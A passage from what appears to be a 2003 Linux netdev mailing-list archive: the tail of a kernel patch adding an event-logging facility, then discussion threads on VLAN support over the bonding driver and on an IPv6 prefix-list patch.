to 15+null. */ +#define FACILITY_MAXLEN 16 + +/* + * struct kern_log_entry - kernel record header + * Each record sent to group KERROR_GROUP_EVLOG begins with this header. + */ +struct kern_log_entry { + __u16 log_kmagic; /* always LOGREC_KMAGIC */ + __u16 log_kversion; /* which version of this struct? */ + __u16 log_size; /* # bytes in variable part of record */ + __s8 log_format; /* BINARY, STRING, PRINTF, NODATA */ + __s8 log_severity; /* DEBUG, INFO, NOTICE, WARN, etc. */ + __s32 log_event_type; /* facility-specific event ID */ + __u32 log_flags; /* EVL_TRUNCATE, etc. */ + __s32 log_processor; /* CPU ID */ + uid_t log_uid; /* event context... 
*/ + gid_t log_gid; + pid_t log_pid; + pid_t log_pgrp; + char log_facility[FACILITY_MAXLEN]; /* e.g., driver name */ +}; + +#define LOGREC_KMAGIC 0x7af8 +#define LOGREC_KVERSION 3 + +#ifdef __KERNEL__ +/* + * severities, AKA priorities + */ +#define LOG_EMERG 0 /* system is unusable */ +#define LOG_ALERT 1 /* action must be taken immediately */ +#define LOG_CRIT 2 /* critical conditions */ +#define LOG_ERR 3 /* error conditions */ +#define LOG_WARNING 4 /* warning conditions */ +#define LOG_NOTICE 5 /* normal but significant condition */ +#define LOG_INFO 6 /* informational */ +#define LOG_DEBUG 7 /* debug-level messages */ + +#ifdef CONFIG_NET +extern int evl_write(const char *facility, int event_type, + int severity, const void *buf, size_t len, int format); +extern int evl_printf(const char *facility, int event_type, int sev, + const char *fmt, ...); +extern int evl_vprintf(const char *facility, int event_type, int sev, + const char *fmt, va_list args); +#else /* ! CONFIG_NET */ +static inline int evl_write(const char *facility, int event_type, + int severity, const void *buf, size_t len, int format) + { return -ENOSYS; } +static inline int evl_printf(const char *facility, int event_type, int sev, + const char *fmt, ...) + { return -ENOSYS; } +static inline int evl_vprintf(const char *facility, int event_type, int sev, + const char *fmt, va_list args) + { return -ENOSYS; } +#endif /* CONFIG_NET */ + +#endif /* __KERNEL__ */ + +#endif /* _LINUX_EVLOG_H */ diff -Naur linux.org/kernel/Makefile linux.evlog.patched/kernel/Makefile --- linux.org/kernel/Makefile Mon Jul 14 09:52:59 2003 +++ linux.evlog.patched/kernel/Makefile Mon Jul 14 09:52:59 2003 @@ -19,6 +19,7 @@ obj-$(CONFIG_BSD_PROCESS_ACCT) += acct.o obj-$(CONFIG_SOFTWARE_SUSPEND) += suspend.o obj-$(CONFIG_COMPAT) += compat.o +obj-$(CONFIG_NET) += evlog.o ifneq ($(CONFIG_IA64),y) # According to Alan Modra , the -fno-omit-frame-pointer is diff -Naur linux.org/kernel/evlog.c linux.evlog.patched/kernel/evlog.c
--- linux.org/kernel/evlog.c Wed Dec 31 16:00:00 1969 +++ linux.evlog.patched/kernel/evlog.c Mon Jul 14 09:52:59 2003 @@ -0,0 +1,542 @@ +/* + * Linux Event Logging + * Copyright (c) International Business Machines Corp., 2003 + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License as published by + * the Free Software Foundation; either version 2 of the License, or + * (at your option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, write to the Free Software + * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. + * + * Please send e-mail to kenistoj@users.sourceforge.net if you have + * questions or comments. + * + * Project Website: http://evlog.sourceforge.net/ + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +static void report_dropped_event(const struct kern_log_entry *hdr, + const void *vardata); +static void report_dropped_printf_event(const struct kern_log_entry *hdr, + const char *fmt, va_list args); + +/** + * mk_rec_header() - Populate evlog record header. 
+ * @fac: facility name (e.g., "kern", driver name) + * @event_type: event type (event ID assigned by programmer; may also be + * computed by recipient -- e.g., CRC of format string) + * @severity: severity level (e.g., LOG_INFO) + * @size: length, in bytes, of variable data + * @flags: event flags (e.g., EVL_TRUNCATE, EVL_EVTYCRC) + * @format: format of variable data (e.g., EVL_STRING) + */ +static void +mk_rec_header(struct kern_log_entry *rec_hdr, + const char *facility, + int event_type, + int severity, + size_t size, + uint flags, + int format) +{ + rec_hdr->log_kmagic = LOGREC_KMAGIC; + rec_hdr->log_kversion = LOGREC_KVERSION; + rec_hdr->log_size = (__u16) size; + rec_hdr->log_format = (__s8) format; + rec_hdr->log_event_type = (__s32) event_type; + rec_hdr->log_severity = (__s8) severity; + rec_hdr->log_uid = current->uid; + rec_hdr->log_gid = current->gid; + rec_hdr->log_pid = current->pid; + rec_hdr->log_pgrp = current->pgrp; + rec_hdr->log_flags = (__u32) flags; + rec_hdr->log_processor = (__s32) smp_processor_id(); + + strncpy(rec_hdr->log_facility, facility, FACILITY_MAXLEN); + rec_hdr->log_facility[FACILITY_MAXLEN-1] = '\0'; +} + +/** + * evl_sendh() - Log event, given a pre-constructed header. + * In case of sloppiness, clean it up rather than failing, since the caller + * is unlikely to handle failure. + * Returns 0 on success, or a negative error code otherwise. 
+ */ +static int +evl_sendh(struct kern_log_entry *hdr, const void *vardata) +{ + struct iovec iov[2] = { + { hdr, sizeof(struct kern_log_entry) }, + { (void*) vardata, hdr->log_size } + }; + int nsegs = 2; + + if (hdr->log_severity < 0 || hdr->log_severity > LOG_DEBUG) { + hdr->log_severity = LOG_WARNING; + } + if (vardata == NULL || hdr->log_size == 0) { + vardata = NULL; + hdr->log_size = 0; + hdr->log_format = EVL_NODATA; + nsegs = 1; + } + hdr->log_flags |= EVL_KERNEL_EVENT; + if (in_interrupt()) { + hdr->log_flags |= EVL_INTERRUPT; + } + if (hdr->log_size > EVL_ENTRY_MAXLEN) { + iov[1].iov_len = hdr->log_size = EVL_ENTRY_MAXLEN; + hdr->log_flags |= EVL_TRUNCATE; + } + + return kernel_error_event_iov(iov, nsegs, KERROR_GROUP_EVLOG); +} + +/** + * evl_write() - write header + optional buffer to event handler + * + * @buf: optional variable-length data + * other args as per mk_rec_header() + */ +int +evl_write(const char *fac, int event_type, int severity, const void *buf, + size_t size, int format) +{ + int ret; + struct kern_log_entry hdr; + + mk_rec_header(&hdr, fac, event_type, severity, size, 0, format); + ret = evl_sendh(&hdr, buf); + if (ret == -ESRCH) { + report_dropped_event(&hdr, buf); + } + return ret; +} + +/* + * A buffer to pack with data, one value at a time. By convention, b_tail + * reflects the total amount you've attempted to add, and so may be past b_end. + */ +struct evl_recbuf { + char *b_buf; /* start of buffer */ + char *b_tail; /* add next data here */ + char *b_end; /* b_buf + buffer size */ +}; + +void +evl_init_recbuf(struct evl_recbuf *b, char *buf, size_t size) +{ + b->b_buf = buf; + b->b_tail = buf; + b->b_end = buf + size; +} + +/** + * evl_put() - Append data to buffer; handle overflow. 
+ * @b - describes buffer; updated to reflect data appended + * @data - data to append + * @datasz - data length in bytes + */ +void +evl_put(struct evl_recbuf *b, const void *data, size_t datasz) +{ + ptrdiff_t room = b->b_end - b->b_tail; + if (room > 0) { + (void) memcpy(b->b_tail, data, min(datasz, (size_t)room)); + } + b->b_tail += datasz; +} + +/** + * evl_puts() - Append string to buffer; handle overflow. + * Append a string to the buffer. If null == 1, we include the terminating + * null. If the string extends over the end of the buffer, terminate the + * buffer with a null. + * + * @b - describes buffer; updated to reflect data appended + * @s - null-terminated string + * @null - 1 if we append the terminating null, 0 otherwise + */ +void +evl_puts(struct evl_recbuf *b, const char *s, int null) +{ + char *old_tail = b->b_tail; + evl_put(b, s, strlen(s) + null); + if (b->b_tail > b->b_end && old_tail < b->b_end) { + *(b->b_end - 1) = '\0'; + } +} + +static inline void +skip_atoi(const char **s) +{ + while (isdigit(**s)) { + (*s)++; + } +} + +/** + * parse_printf_fmt() - Parse printf/printk conversion spec. + * fmt points to the '%' in a printk conversion specification. Advance + * fmt past any flags, width and/or precision specifiers, and qualifiers + * such as 'l' and 'L'. Return a pointer to the conversion character. + * Stores the qualifier character (or -1, if there is none) at *pqualifier. + * *wp is set to flags indicating whether the width and/or precision are '*'. + * For example, given + * %*.2lx + * *pqualifier is set to 'l', *wp is set to 0x1, and a pointer to the 'x' + * is returned. + * + * Note: This function is derived from vsnprintf() (see lib/vsprintf.c), + * and should be kept in sync with that function. + * + * @fmt - points to '%' in conversion spec + * @pqualifier - *pqualifier is set to conversion spec's qualifier, or -1. + * @wp - Bits in *wp are set if the width or/and precision are '*'. 
+ */ +const char * +parse_printf_fmt(const char *fmt, int *pqualifier, int *wp) +{ + int qualifier = -1; + *wp = 0; + + /* process flags */ + repeat: + ++fmt; /* this also skips first '%' */ + switch (*fmt) { + case '-': + case '+': + case ' ': + case '#': + case '0': + goto repeat; + } + + /* get field width */ + if (isdigit(*fmt)) + skip_atoi(&fmt); + else if (*fmt == '*') { + ++fmt; + /* it's the next argument */ + *wp |= 0x1; + } + + /* get the precision */ + if (*fmt == '.') { + ++fmt; + if (isdigit(*fmt)) + skip_atoi(&fmt); + else if (*fmt == '*') { + ++fmt; + /* it's the next argument */ + *wp |= 0x2; + } + } + + /* get the conversion qualifier */ + if (*fmt == 'h' || *fmt == 'l' || *fmt == 'L' || + *fmt == 'Z' || *fmt == 'z') { + qualifier = *fmt; + ++fmt; + if (qualifier == 'l' && *fmt == 'l') { + qualifier = 'L'; + ++fmt; + } + } + + *pqualifier = qualifier; + return fmt; +} + +/** + * evl_pack_args() - Pack args into buffer, guided by format string. + * b describes a buffer. fmt and args are as passed to vsnprintf(). Using + * fmt as a guide, copy the args into b's buffer. + * + * @b - describes buffer; updated to reflect data added + * @fmt - printf/printk-style format string + * @args - values to be packed into buffer + */ +void +evl_pack_args(struct evl_recbuf *b, const char *fmt, va_list args) +{ +#define COPYARG(type) \ + do { type v=va_arg(args,type); evl_put(b,&v,sizeof(v)); } while(0) + + const char *s; + int qualifier; + + for (; *fmt ; ++fmt) { + int wp = 0x0; + if (*fmt != '%') { + continue; + } + + fmt = parse_printf_fmt(fmt, &qualifier, &wp); + if (wp & 0x1) { + /* width is '*' (next arg) */ + COPYARG(int); + } + if (wp & 0x2) { + /* ditto precision */ + COPYARG(int); + } + + switch (*fmt) { + case 'c': + COPYARG(int); + continue; + + case 's': + s = va_arg(args, char *); + evl_puts(b, s, 1); + continue; + + case 'p': + COPYARG(void*); + continue; + + case 'n': + /* Skip over the %n arg. 
*/ + if (qualifier == 'l') { + (void) va_arg(args, long *); + } else if (qualifier == 'Z' || qualifier == 'z') { + (void) va_arg(args, size_t *); + } else { + (void) va_arg(args, int *); + } + continue; + + case '%': + continue; + + /* integer number formats - handle outside switch */ + case 'o': + case 'X': + case 'x': + case 'd': + case 'i': + case 'u': + break; + + default: + /* Bogus conversion. Pass thru unchanged. */ + if (*fmt == '\0') + --fmt; + continue; + } + if (qualifier == 'L') { + COPYARG(long long); + } else if (qualifier == 'l') { + COPYARG(long); + } else if (qualifier == 'Z' || qualifier == 'z') { + COPYARG(size_t); + } else if (qualifier == 'h') { + COPYARG(int); + } else { + COPYARG(int); + } + } +} + +/* + * Scratch buffer for constructing event records. This is static because + * (1) we want events to be logged even in low-memory situations; and + * (2) the buffer is too big to be an auto variable. + */ +static spinlock_t msgbuf_lock = SPIN_LOCK_UNLOCKED; +static char msgbuf[EVL_ENTRY_MAXLEN]; + +/** + * evl_send_printf() - Format and log a PRINTF-format message. + * Create and log a PRINTF-format event record whose contents are: + * format string + * int containing args size + * args + * @hdr - pre-constructed record header + * @fmt - format string + * @args - arg list + */ +static int +evl_send_printf(struct kern_log_entry *hdr, const char *fmt, va_list args) +{ + int ret; + struct evl_recbuf b; + int argsz = 0; + char *nl, *pargsz, *pargs; + unsigned long iflags; + + spin_lock_irqsave(&msgbuf_lock, iflags); + evl_init_recbuf(&b, msgbuf, EVL_ENTRY_MAXLEN); + evl_puts(&b, fmt, 1); + + /* + * If the format ends in a newline, remove it. We remove the + * terminating newline to increase flexibility when formatting + * the record for viewing. + */ + nl = b.b_tail - 2; + if (b.b_buf <= nl && nl < b.b_end && *nl == '\n') { + *nl = '\0'; + b.b_tail--; + } + + /* Remember where to store argsz; store 0 for now. 
*/ + pargsz = b.b_tail; + evl_put(&b, &argsz, sizeof(argsz)); + pargs = b.b_tail; + + evl_pack_args(&b, fmt, args); + if (pargs <= b.b_end) { + argsz = (int) (b.b_tail - pargs); + memcpy(pargsz, &argsz, sizeof(argsz)); + } + + hdr->log_size = b.b_tail - b.b_buf; + if (hdr->log_size > EVL_ENTRY_MAXLEN) { + hdr->log_size = EVL_ENTRY_MAXLEN; + hdr->log_flags |= EVL_TRUNCATE; + } + + ret = evl_sendh(hdr, b.b_buf); + spin_unlock_irqrestore(&msgbuf_lock, iflags); + + if (ret == -ESRCH) { + report_dropped_printf_event(hdr, fmt, args); + } + return ret; +} + +/** + * evl_vprintf() - Format and log a PRINTF-format record. + * @fmt - format string + * @args - arg list + * other args as per mk_rec_header(). If event_type == 0, set flag to + * request that recipient set event type. + */ +int +evl_vprintf(const char *facility, int event_type, int severity, + const char *fmt, va_list args) +{ + struct kern_log_entry hdr; + unsigned int flags = 0; + if (event_type == 0) { + flags |= EVL_EVTYCRC; + } + mk_rec_header(&hdr, facility, event_type, severity, 0, flags, + EVL_PRINTF); + + return evl_send_printf(&hdr, fmt, args); +} + +/** + * evl_printf() - Format and log a PRINTF-format record. + * @fmt - format string + * other args as per mk_rec_header() + */ +int +evl_printf(const char *facility, int event_type, int severity, + const char *fmt, ...) 
+{ + va_list args; + int ret; + va_start(args, fmt); + ret = evl_vprintf(facility, event_type, severity, fmt, args); + va_end(args); + return ret; +} + +/*** Functions for handling of events logged when nobody was listening ***/ +static void +report_dropped_hdr(const struct kern_log_entry *hdr) +{ + printk("<%d>evlog packet dropped: size=%u fmt=%d evty=%#x" + " fac=%s sev=%d uid=%u gid=%u pid=%d pgrp=%d" + " flags=%#x cpu=%d\n", + hdr->log_severity, hdr->log_size, hdr->log_format, + hdr->log_event_type, hdr->log_facility, hdr->log_severity, + hdr->log_uid, hdr->log_gid, hdr->log_pid, hdr->log_pgrp, + hdr->log_flags, hdr->log_processor); +} + +static void +report_dropped_printf_event(const struct kern_log_entry *hdr, const char *fmt, + va_list args) +{ + char msg[500]; + if (hdr->log_flags & EVL_PRINTK) { + /* printk's already reporting this event. */ + return; + } + report_dropped_hdr(hdr); + vsnprintf(msg, 500, fmt, args); + printk("<%d>%s\n", hdr->log_severity, msg); +} + +static void +hexdump(const void *data, size_t nbytes, int severity) +{ +#define MAX_HEXDUMP_LEN 512 /* Keep this small: don't flood printk buffer */ + size_t nb = min(nbytes, (size_t)MAX_HEXDUMP_LEN); + const unsigned char *dbase = (const unsigned char*) data; + const unsigned char *dp = dbase, *dend = dbase + nb; + char *lp, line[100]; + int i; + + while (dp < dend) { + lp = line; + lp += sprintf(lp, "%04X ", (unsigned) (dp - dbase)); + for (i = 0; i < 16 && dp < dend; i++, dp++) { + lp += sprintf(lp, "%02X ", *dp); + } + printk("<%d>%s\n", severity, line); + } +} + +static void +report_dropped_event(const struct kern_log_entry *hdr, const void *vardata) +{ + if (hdr->log_flags & EVL_PRINTK) { + /* printk's already reporting this event. 
*/ + return; + } + report_dropped_hdr(hdr); + switch (hdr->log_format) { + case EVL_STRING: + printk("<%d>%s\n", hdr->log_severity, (const char*) vardata); + break; + case EVL_PRINTF: + /* Should be handled by report_dropped_printf_event() */ + /*FALLTHRU*/ + case EVL_BINARY: + hexdump(vardata, hdr->log_size, hdr->log_severity); + break; + case EVL_NODATA: + default: + break; + } +} + +EXPORT_SYMBOL(evl_write); +EXPORT_SYMBOL(evl_printf); +EXPORT_SYMBOL(evl_vprintf); --------------C7D4C0502BFD8844E4AD4ADE-- From DanE@aiinet.com Tue Jul 15 10:51:07 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 10:51:13 -0700 (PDT) Received: from aimail.aiinet.priv ([205.245.181.13]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FHp4Fl032556 for ; Tue, 15 Jul 2003 10:51:07 -0700 Received: by aimail.aiinet.priv with Internet Mail Service (5.5.2653.19) id ; Tue, 15 Jul 2003 13:49:51 -0400 Message-ID: From: "Eble, Dan" To: "'Shmulik Hen'" , "'Stephen Hemminger'" Cc: bond-devel , linux-net , linux-netdev , "David S. Miller" , Ben Greear , Jeff Garzik , Jay Vosburgh , Amir Noam , Noam Marom , Tsippy Mendelson Subject: RE: [RFC][bonding] Improve VLAN support on top of bonding Date: Tue, 15 Jul 2003 13:49:50 -0400 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain X-archive-position: 4057 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: DanE@aiinet.com Precedence: bulk X-list: netdev My US$0.02: Bonding and bridging have some things in common, at least as far as having to deal with diverse hardware. It would be nice to have a [un]tagging interface that is useful to both drivers with as little code duplication as is reasonably possible. > -----Original Message----- > From: Shmulik Hen [mailto:shmulik.hen@intel.com] > Sent: Tuesday, July 15, 2003 9:55 AM > To: bond-devel; linux-net; linux-netdev; David S. 
Miller; Ben > Greear; Jeff Garzik; Jay Vosburgh > Cc: Amir Noam; Noam Marom; Shmulik Hen; Tsippy Mendelson > Subject: [RFC][bonding] Improve VLAN support on top of bonding > > > Hi All, > > Currently, when using 8021q VLAN module to work on top > of bonding, > everything seems to work OK, but there are some issues that > will not work > according to our analysis. For example, any self-generated > packets sent by > bonding itself (e.g. arp-mon, TLB learning packets, ALB arp > replies, etc.) > do not have the VLAN id tag in them, and thus will not go through the > switch. Also, in order to configure a VLAN interface, the underlying > interface must be configured first to IP address 0.0.0.0. > Since arp-mon > uses bond's IP address, this might cause further problems. Other issue > we've still not investigated, like what happens if bonding > needs to parse > a tagged packet for layer2/layer3 data, might still create > more problems. > > We have come up with some possible solution we would like to get > comments on. First of all, our main guide line was not to > duplicate code > segments that are in the VLAN module and put them in bonding. > Further, we > figured bonding should not need to know about how the VLAN > module handles > hardware acceleration. On the other hand, bonding does need > to know what > VLAN tags are being used so it may send packets successfully > through all > the switch ports, so some kind of policy needs to be defined. > > So here is what we've come up with until now. > > 1. Configuration > Need to decide between: > a. Block VLAN add/del operations when bond has no slaves. > b. Block enslave/release of slaves when bond has no VLAN > tags (needs a > module parameter). > c. Remove limitation of IP 0.0.0.0. > > 2. Indication > Need to decide between: > a. Add notification mechanism in VLAN module that bonding > may register > to listen to, and thus keep track of VLAN tags added/removed. > b. 
Register to listen to net device register/unregister > notifications > to monitor creation/destruction of VLAN devices. > Requires support > for figuring out if a net device is a VLAN device, and > also two vlan > calls like get_realdev() and get_vlan_id() exported. > c. Parse every packet going through bonding to collect VLAN tags. > > 3. Monitoring > In order for bonding to be able to generate tagged packets > on its own, > two major changes need to be done. One is split the vlan_start_xmit > function into insert_tag() and vlan_xmit(), so bonding may > choose the > required tag on its own, and let 8021q to the transmit. A > second change > is to split arp_send() into arp_create() and arp_send(), > so bonding may > pass all the usual parameters for arp creation, get a complete arp > packet and then pass it to 8021q for tag insertion on transmission. > > > Hardware acceleration > ===================== > When coming to analyze what is required for adding support for > VLAN hardware acceleration on top of bonding, other issues > come to mind. > Since add/del operations are defined and handshakes are > performed between > the VLAN module and the device driver, tracking VLAN tags is > simpler and > commands should just be propagated to the slaves. Enslaving/releasing > slaves should also be simple and just require adding/removing existing > VLAN tags from them. The problem is how to handle > configuration issues. > > 1. Since adding the first VLAN tag requires some additional > handshake, > can bonding support that operation on a bond that > already has slaves > and is running? > 2. What about removing the last tag from a bond? > 3. Should the bond device declare itself as "VLAN challenged" before > registering and remove that limitation only once it has slaves? > 4. Should the bond declare itself as fully hardware > acceleration capable > to benefit from "strong" slaves while performing regular VLAN > inserting/stripping for "weak" slaves? > 5. 
How can bonding generate untagged packets and send them via > hardware acceleration capable slaves (e.g. 802.3ad LACPDU) ? > > > -- > | Shmulik Hen | > | Israel Design Center (Jerusalem) | > | LAN Access Division | > | Intel Communications Group, Intel corp. | > > > - > To unsubscribe from this list: send the line "unsubscribe > linux-net" in > the body of a message to majordomo@vger.kernel.org > More majordomo info at http://vger.kernel.org/majordomo-info.html > From goemon@anime.net Tue Jul 15 11:07:32 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 11:07:42 -0700 (PDT) Received: from sasami.anime.net (sasami.anime.net [208.8.184.120] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FI7UFl002066 for ; Tue, 15 Jul 2003 11:07:31 -0700 Received: from localhost (goemon@localhost) by sasami.anime.net (8.11.6/8.11.6) with ESMTP id h6FHt9W05381; Tue, 15 Jul 2003 10:55:09 -0700 Date: Tue, 15 Jul 2003 10:55:09 -0700 (PDT) From: Dan Hollis To: Ben Greear cc: Shmulik Hen , bond-devel , linux-net , linux-netdev , "David S. Miller" , Jeff Garzik , Jay Vosburgh , Amir Noam , Noam Marom , Tsippy Mendelson Subject: Re: [Bonding-devel] Re: [RFC][bonding] Improve VLAN support on top of bonding In-Reply-To: <3F1438E1.5000600@candelatech.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4058 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: goemon@anime.net Precedence: bulk X-list: netdev On Tue, 15 Jul 2003, Ben Greear wrote: > I'd consider ignoring the HW accel unless you can prove it actually helps > performance to a noticeable degree. I have never seen results of any benchmarking > related to this... For gigabit ethernet, it makes a *H*U*G*E* difference. -Dan -- [-] Omae no subete no kichi wa ore no mono da. 
[-] From greearb@candelatech.com Tue Jul 15 11:14:18 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 11:14:22 -0700 (PDT) Received: from grok.yi.org (evrtwa1-ar2-4-33-045-074.evrtwa1.dsl-verizon.net [4.33.45.74]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FIEHFl003244 for ; Tue, 15 Jul 2003 11:14:18 -0700 Received: from candelatech.com (localhost.localdomain [127.0.0.1]) by grok.yi.org (8.12.8/8.12.8) with ESMTP id h6FIDwKk017544; Tue, 15 Jul 2003 11:13:58 -0700 Message-ID: <3F144466.8010003@candelatech.com> Date: Tue, 15 Jul 2003 11:13:58 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Dan Hollis CC: Shmulik Hen , bond-devel , linux-net , linux-netdev , "David S. Miller" , Jeff Garzik , Jay Vosburgh , Amir Noam , Noam Marom , Tsippy Mendelson Subject: Re: [Bonding-devel] Re: [RFC][bonding] Improve VLAN support on top of bonding References: In-Reply-To: Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4059 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev Dan Hollis wrote: > On Tue, 15 Jul 2003, Ben Greear wrote: > >>I'd consider ignoring the HW accel unless you can prove it actually helps >>performance to a noticeable degree. I have never seen results of any benchmarking >>related to this... > > > For gigabit ethernet, it makes a *H*U*G*E* difference. I'm curious to see numbers. The VLAN shim is only inserting a small shim header, at most shifting the first part of the packet when sent a pre-built packet. Maybe the hw-accel turns on tcp checksumming or something too??
> > -Dan -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From goemon@anime.net Tue Jul 15 11:17:03 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 11:17:07 -0700 (PDT) Received: from sasami.anime.net (sasami.anime.net [208.8.184.120] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FIH2Fl003586 for ; Tue, 15 Jul 2003 11:17:03 -0700 Received: from localhost (goemon@localhost) by sasami.anime.net (8.11.6/8.11.6) with ESMTP id h6FIGcg06021; Tue, 15 Jul 2003 11:16:38 -0700 Date: Tue, 15 Jul 2003 11:16:38 -0700 (PDT) From: Dan Hollis To: Ben Greear cc: Shmulik Hen , bond-devel , linux-net , linux-netdev , "David S. Miller" , Jeff Garzik , Jay Vosburgh , Amir Noam , Noam Marom , Tsippy Mendelson Subject: Re: [Bonding-devel] Re: [RFC][bonding] Improve VLAN support on top of bonding In-Reply-To: <3F144466.8010003@candelatech.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4060 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: goemon@anime.net Precedence: bulk X-list: netdev On Tue, 15 Jul 2003, Ben Greear wrote: > Dan Hollis wrote: > > On Tue, 15 Jul 2003, Ben Greear wrote: > >>I'd consider ignoring the HW accel unless you can prove it actually helps > >>performance to a noticeable degree. I have never seen results of any benchmarking > >>related to this... > > For gigabit ethernet, it makes a *H*U*G*E* difference. > I'm curious to see numbers. The VLAN shim is only inserting > a small shim header, at at most shifting the first part of the packet > when sent a pre-built packet. > Maybe the hw-accel turns on tcp checksumming or something too?? That is exactly what it does. hw tcp checksumming helps a LOT at gbe rates -Dan -- [-] Omae no subete no kichi wa ore no mono da. 
[-] From krkumar@us.ibm.com Tue Jul 15 11:35:21 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 11:35:29 -0700 (PDT) Received: from e3.ny.us.ibm.com (e3.ny.us.ibm.com [32.97.182.103]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FIZEFl005652 for ; Tue, 15 Jul 2003 11:35:21 -0700 Received: from northrelay04.pok.ibm.com (northrelay04.pok.ibm.com [9.56.224.206]) by e3.ny.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6FIYSpW164670; Tue, 15 Jul 2003 14:34:28 -0400 Received: from us.ibm.com (d01av02.pok.ibm.com [9.56.224.216]) by northrelay04.pok.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6FIYPrU082670; Tue, 15 Jul 2003 14:34:26 -0400 Message-ID: <3F14492C.30708@us.ibm.com> Date: Tue, 15 Jul 2003 11:34:20 -0700 From: Krishna Kumar Organization: IBM User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.2.1) Gecko/20021130 X-Accept-Language: en-us, en MIME-Version: 1.0 To: kuznet@ms2.inr.ac.ru CC: yoshfuji@linux-ipv6.org, davem@redhat.com, netdev@oss.sgi.com, linux-net@vger.kernel.org Subject: Re: [PATCH 1/4] Prefix List against 2.5.73 References: <200307150117.FAA06705@dub.inr.ac.ru> In-Reply-To: <200307150117.FAA06705@dub.inr.ac.ru> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4061 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: krkumar@us.ibm.com Precedence: bulk X-list: netdev Hi Alexey, >>+ IFA_IFFLAGS, > > What's about ifa_flags? There is some space there, and the things > kept there now: TENTATIVE/DEPRECATED et al. are close relatives > of O/M. > > Alexey, O/M are not flags for addresses, but for interfaces. > > > But tell me, please, what is the difference between new _address_ > > > attribute IFA_IFFLAGS and already existing address attrbute ifa_flags? Conceptually these are different, one for address and one for interface. 
But I also agree with your point that these can both be enclosed within one attribute to return. If we agree to do it this way, then we have to change the values of one of the two sets of #defines (if_flags & ifa_flags, since they intersect). I propose changing the values of IFA_PERM/TENT/DEPRE/SECOND, etc., for no reason other than that the MANAGED/OTHER flags have values copied from the RA (bitwise values of the icmpv6_nd_ra field of the RA). It might make more sense to keep 0x80 for field 'M', which is the first bit of the field, but let me know if this is not acceptable. > This does not pass through Occam's razor. Why not to give a filter to plain > RTM_GETROUTE? We did not implement filtering not because we do not want, > but because we (me, is more appropriate) are lazy. OK, I can change that to give a filter. Is it OK to add the filter to rtm_flags? I was thinking of adding RTM_F_PREFIX, and rt6_dump_route() can pass this information to rt6_fill_node(), which filters routes based on whether this flag is set or not. Did I understand you correctly here? > Also, I am not sure that the interface should include things sort of > > + if ((addr_type & (IPV6_ADDR_LINKLOCAL | IPV6_ADDR_LOOPBACK | > + IPV6_ADDR_MULTICAST)) != 0 || > + addr_type == IPV6_ADDR_ANY) > I can remove the check completely and introduce a new flag RTF_PREFIX_RT to distinguish between various route types. Are these modifications OK? Thanks, - KK > For kernel all they are direct routes, if the application wants to apply > some policy not formulated in terms of filters for RTM_GETROUTE, let it > to filter itself. Moreover, I used to emphasize that user of rtnetlink > should not believe to reliability of kernel filtering. It is just necessary > measure to guarantee that a new application, which is aware of a new > attribute, will behave correctly with older kernels, which are not aware > of this attribute. Not a requirement, of course.
